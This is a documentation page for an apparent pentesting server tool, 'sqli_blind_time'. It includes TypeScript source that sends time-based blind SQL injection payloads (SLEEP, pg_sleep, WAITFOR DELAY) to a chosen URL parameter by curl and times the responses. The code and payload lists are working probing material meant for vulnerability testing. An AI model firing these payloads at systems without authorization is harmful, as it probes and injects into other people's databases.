sqli_blind_time
Detect time-based blind SQL injection vulnerabilities by sending sleep-inducing payloads and measuring response delays in MySQL, PostgreSQL, and MSSQL databases.
Instructions
Time-based blind SQLi detection for MySQL, PostgreSQL, and MSSQL. Sends sleep-inducing payloads and measures response time to detect injection. Returns vulnerable, dbtype, and results array with payload, response_time, triggered. Side effects: Read-only but slow (each payload waits up to delay_seconds). Sends 3 requests.
Input Schema
TableJSON Schema
| Name | Required | Description | Default |
|---|---|---|---|
| url | Yes | Full URL with injectable parameter | |
| parameter | Yes | Vulnerable parameter name | |
| dbtype | No | Target database type | |
| delay_seconds | No | Sleep duration for true condition |
Implementation Reference
- src/tools/sqli.ts:316-373 (handler)The handler function for sqli_blind_time executes the time-based SQL injection logic by sending sleep-inducing payloads and measuring response times.
async ({ url, parameter, dbtype = "mysql", delay_seconds = 3 }) => { requireTool("curl"); const baseUrl = url.split("?")[0]; const sleepPayloads: Record<string, string[]> = { mysql: [ `' AND IF(1=1, SLEEP(${delay_seconds}), 0)-- -`, `' AND (SELECT SLEEP(${delay_seconds}))-- -`, `' OR SLEEP(${delay_seconds})-- -`, ], postgresql: [ `' AND pg_sleep(${delay_seconds})-- -`, `'; SELECT pg_sleep(${delay_seconds})-- -`, `' || pg_sleep(${delay_seconds})-- -`, ], mssql: [ `'; WAITFOR DELAY '0:0:${delay_seconds}'-- -`, `' AND 1=1; WAITFOR DELAY '0:0:${delay_seconds}'-- -`, `'; IF(1=1) WAITFOR DELAY '0:0:${delay_seconds}'-- -`, ], }; const results = []; for (const payload of sleepPayloads[dbtype]) { const res = await runCmd( "curl", [ "-sk", "-o", "/dev/null", "-w", "%{time_total}", `${baseUrl}?${parameter}=${payload}`, ], { timeout: delay_seconds + 15 } ); let elapsed = 0.0; try { elapsed = parseFloat(res.stdout); if (isNaN(elapsed)) elapsed = 0.0; } catch { elapsed = 0.0; } const triggered = elapsed >= delay_seconds * 0.8; results.push({ payload, response_time_seconds: Math.round(elapsed * 100) / 100, triggered, }); } const anyTriggered = results.some((r) => r.triggered); const result = { vulnerable: anyTriggered, dbtype, delay_seconds, results, }; return { content: [{ type: "text" as const, text: JSON.stringify(result, null, 2) }] }; } - src/tools/sqli.ts:307-315 (registration)Registration of the sqli_blind_time tool including its schema definition and description.
server.tool( "sqli_blind_time", "Time-based blind SQLi detection for MySQL, PostgreSQL, and MSSQL. Sends sleep-inducing payloads and measures response time to detect injection. Returns vulnerable, dbtype, and results array with payload, response_time, triggered. Side effects: Read-only but slow (each payload waits up to delay_seconds). Sends 3 requests.", { url: z.string().describe("Full URL with injectable parameter"), parameter: z.string().describe("Vulnerable parameter name"), dbtype: z.enum(["mysql", "postgresql", "mssql"]).optional().describe("Target database type"), delay_seconds: z.number().min(1).max(10).optional().describe("Sleep duration for true condition"), },